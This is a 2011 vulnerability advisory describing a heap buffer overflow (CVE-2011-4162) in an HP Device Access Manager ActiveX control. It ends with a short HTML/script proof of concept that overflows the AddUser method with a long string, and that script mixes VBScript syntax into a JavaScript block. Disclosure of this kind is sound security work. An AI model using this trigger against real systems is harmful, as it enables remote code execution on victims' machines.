Buffer Overflow in HP Device Access Manager for Protect Tools Information Store

2011-08-26T00:00:00
ID HTB23044
Type htbridge
Reporter High-Tech Bridge
Modified 2011-12-02T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered vulnerabilities in HP Device Access Manager for Protect Tools Information Store which could be exploited to compromise vulnerable system.

1) Buffer overflow in HP Device Access Manager for Protect Tools Information Store: CVE-2011-4162
The vulnerability exists due to an error in the Device Access Manager ActiveX Control (PTDMInformationStore.dll) while handling the AddUser(), AddUserEx(), RemoveUser(), RemoveUserByGuide(), RemoveUserEx() and RemoveUserRegardless() methods. A remote attacker can create a specially crafted webpage, cause heap-based buffer overflow and execute arbitrary code on the target system with privileges of the current user.

Exploitation example:
<HTML>
<BODY>
<object id="target"
classid="clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}"></object >
<SCRIPT language="JavaScript">
function Do_It()
{
arg1=String(1044, "X")
target.AddUser arg1
}
</SCRIPT>
<input onclick="Do_It()" type="button" value="P0c">
</BODY>
</HTML>